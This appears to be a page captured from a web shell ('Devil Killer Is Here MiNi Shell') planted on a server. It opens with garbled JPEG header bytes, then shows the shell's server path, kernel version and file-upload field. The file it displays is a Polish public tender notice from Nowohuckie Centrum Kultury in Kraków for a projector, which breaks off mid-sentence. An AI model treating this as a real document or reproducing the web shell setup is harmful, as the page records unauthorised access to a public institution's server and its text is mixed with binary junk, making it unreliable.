JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221202/0047396301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawę projektora multimedialnego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nowohuckie Centrum Kultury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001002538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Jana Pawła II 232</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-913</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@nck.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nck.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawę projektora multimedialnego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e2cf017-723e-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00473963</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00044549/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa projektora multimedialnego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.krakow.pl/?bip_id=468&amp;mmi=12617 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://obywatel.gov.pl/nforms/ezamowienia<br/>www.bip.krakow.pl/?bip_id=468&amp;mmi=12617</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://obywatel.gov.pl/nforms/ezamowienia oraz poczty<br/>elektronicznej. 2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać<br/>konto na ePUAP. 3. Wykonawca składa tylko jedną ofertę za pośrednictwem „Formularza do złożenia,<br/>zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Wraz z formularzem należy złożyć pozostałe dokumenty wskazane w pkt 6.1.1. – 6.1.7.<br/>SWZ. 4. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika<br/>systemu miniPortal oraz Regualminie ePUAP”. 5. Identyfikator postępowania został wskazany w pkt 2.<br/>SWZ. 6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. 7. Za datę przekazania oferty,<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP .8.<br/>Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia<br/>dostępne są na Liście wszystkich postępowań na miniPortalu oraz stanowi załącznik nr 6 do niniejszej<br/>SWZ 9. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452).<br/>10. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w<br/>postępowaniu<br/>określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie. Zamawiający wskazuje jednak, że wśród dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf,<br/>.doc, .docx, .odt., ze szczególnym wskazaniem na<br/>.pdf.Zalecenia:1)Zamawiający wskazuje jednak, że wśród dopuszczalnych i ogólnie dostępnych<br/>formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx, .odt ze szczególnym wskazaniem na<br/>.pdf.2)Jeżeli na ofertę składa się kilka dokumentów, Wykonawca powinien stworzyć folder, do którego<br/>przeniesie wszystkie dokumenty oferty, podpisane kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym. Następnie z tego folderu Wykonawca zrobi folder .zip<br/>(bez nadawania mu haseł i bez szyfrowania). W kolejnym kroku za pośrednictwem Aplikacji do<br/>szyfrowania (miniPortal) Wykonawca zaszyfruje folder zawierający dokumenty składające się na ofertę.<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: −<br/>.zip −.7Z 3) wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif<br/>.bmp.numbers .pages. 3)Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych<br/>profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w<br/>aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB, 4)ze względu na<br/>niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca,<br/>w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie<br/>ich podpisem kwalifikowanym PAdES, 5)pliki w innych formatach niż PDF zaleca się opatrzyć<br/>zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać<br/>łącznie z dokumentem podpisywanym .c.d. w Informacjach dodatkowych i w pkt 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Nowohuckie Centrum Kultury z siedzibą w (31-913)<br/>Krakowie, al. Jana Pawła II 232, działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 roku (dalej: Rozporządzenie) informuje, że:<br/>1) administratorem danych osobowych przekazanych przez Wykonawcę w ofercie i we wszelkich<br/>dokumentach składanych w postępowaniu o udzielenie niniejszego postępowania jest Zamawiający –<br/>Nowohuckie Centrum Kultury, al. Jana Pawła II 232, 31-913 Kraków,<br/>2) Inspektor Ochrony Danych – kontakt: e-mail: IODO@NCK.KRAKOW.PL, poczta tradycyjna:<br/>Nowohuckie Centrum Kultury, al. Jana Pawła II 232, 31-913 Kraków<br/>3) Przetwarzanie danych, o których mowa w pkt 1) w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego następuje na podstawie z art. 6 ust. 1 lit. b i c Rozporządzenia,<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty którym zostanie udostępniona<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>5) ww. dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia<br/>6) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy pzp, konsekwencje niepodania danych wynikają z ustawy pzp.<br/>7) Wykonawcy mają prawo do żądania od Zamawiającego dostępu do swoich danych osobowych, ich<br/>sprostowania, ograniczenia przetwarzania.<br/>8) W związku z przetwarzaniem danych osobowych przez Administratora przysługuje prawo wniesienia<br/>skargi do organu nadzorczego.<br/>9) Nie przysługuje Pani/Panu:<br/>• w zw. z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAT.271.29.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprzedaż i dostawa projektora multimedialnego wraz z akcesoriami na potrzeby Nowohuckiego centrum Kultury zgodnie z opisem przedmiotu zamówienia zawartym w pkt 3.1. SWZ.<br/>3.2.	Projektor multimedialny będący przedmiotem zamówienia może być używany jednak winien być wyprodukowany nie wcześniej niż przed 2018 rokiem oraz ilość wyświetlonych godzin nie może być wyższa niż 1500 godzin, co będzie przedmiotem oceny w kryteriach oceny ofert.<br/>3.3.	Oferowane i dostarczone urządzenia i ich elementy muszą być, nieuszkodzone, wolne od wad, kompletne, zdatne do prawidłowej eksploatacji - zgodnie z zakresem funkcjonalnym i jego przeznaczeniem, nadto oznaczone znakiem CE, muszą posiadać odpowiednie atesty, deklaracje zgodności z obowiązującymi normami, certyfikaty bezpieczeństwa.<br/>3.4.	W ramach realizacji zamówienia Wykonawca jest zobowiązany do zrealizowania prac towarzyszących przedmiotowej dostawie, takich jak transport i ubezpieczenie na czas transportu, załadunek i rozładunek, wniesienie do pomieszczeń i rozmieszczenie oraz wszelkich innych dodatkowych prac niezbędnych do prawidłowego wykonania zamówienia.<br/>3.5.	W celu potwierdzenia, że oferowane urządzenia posiadają określone parametry wykonawca ma załączyć do oferty przedmiotowe środki dowodowe w postaci wykazu parametrów oferowanych urządzeń/materiałów sporządzonego wg. wzoru w Załączniku nr 4 do SWZ oraz karty katalogowe oferowanych urządzeń/materiałów (gdzie dotyczy) z wyszczególnionymi minimalnymi wymaganiami podanymi w opisie przedmiotu zamówienia w języku polskim lub z tłumaczeniem na język polski oraz podać producenta i typ urządzeń. Zamawiający żąda przedłożenia ww. dokumentów wraz z ofertą na podstawie art. 107 ust.1 ustawy i przewiduje możliwość ich uzupełnienia zgodnie a treścią art. 107 ust. 2 ustawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38652100-1 - Projektory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, gwarancji i ilości wyświetlonych godzin 2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. 3. Za<br/>najkorzystniejszą zostanie uznana oferta z najniższą ceną. 4. W sytuacji, gdy Zamawiający nie będzie<br/>mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej<br/>samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich<br/>ofertach. 5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń.<br/>Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez<br/>Zamawiającego. 6. Zamawiający̨ wybiera najkorzystniejsza ̨ ofertę ̨ w terminie związanią oferta ̨<br/>określonyḿ w SWZ. 7. Jeżeli̇ termin związanią oferta ̨ upłynie przed wyborem najkorzystniejszej oferty,<br/>Zamawiający̨ wezwie Wykonawcę,̨ któregó oferta otrzymała najwyższą ̨ ocenę,̨ do wyrażenia,̇ w<br/>wyznaczonym przez Zamawiającegǫ terminie, pisemnej zgody na wybóŕ jego oferty. 8. W przypadku<br/>braku zgody, o której́ mowa w ust. 18.7, oferta podlega odrzuceniu, a Zamawiający̨ zwraca się o<br/>wyrażeniė takiej zgody do kolejnego Wykonawcy, któregó oferta została najwyżej̇ oceniona, chyba zė zachodzą ̨ przesłanki do<br/>unieważnieniȧ postepowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość godzin wyświetlonych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności<br/>informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt<br/>6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w<br/>pkt 5.2. SWZ odpowiednio: a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub<br/>zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, sporządzone<br/>wg. wzoru w Załączniku nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu ponieważ nie stawia takich warunków</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> wykaz parametrów oferowanych urządzeń/materiałów sporządzonego wg. wzoru w Załączniku nr 4 do SWZ oraz karty katalogowe oferowanych urządzeń/materiałów (gdzie dotyczy) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> wykaz parametrów oferowanych urządzeń/materiałów sporządzonego wg. wzoru w Załączniku nr 4 do SWZ oraz karty katalogowe <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w składanej ofercie. <br/>2.	Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają: <br/>2.1.	każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dot. każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>2.2.	dokument, o którym mowa w pkt 6.1.1. i 6.1.2. SWZ; <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum) ponoszą, zgodnie z art. 445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy – jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana treści umowy może nastąpić wyłącznie w formie pisemnej, pod rygorem nieważności, przy uwzględnieniu postanowień art. 455 ustawy Pzp.<br/>2.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy w następujących przypadkach:<br/>1)	wysokości wynagrodzenia w przypadku zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy, <br/>2)	terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana: <br/>a.	siłą wyższą – rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w części lub całości, a w szczególności epidemią lub stanem zagrożenia epidemią Sars-CoV - 2 stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym, <br/>b.	wycofania z produkcji lub sprzedaży urządzeń będących przedmiotem zamówienia, pod warunkiem że Wykonawca 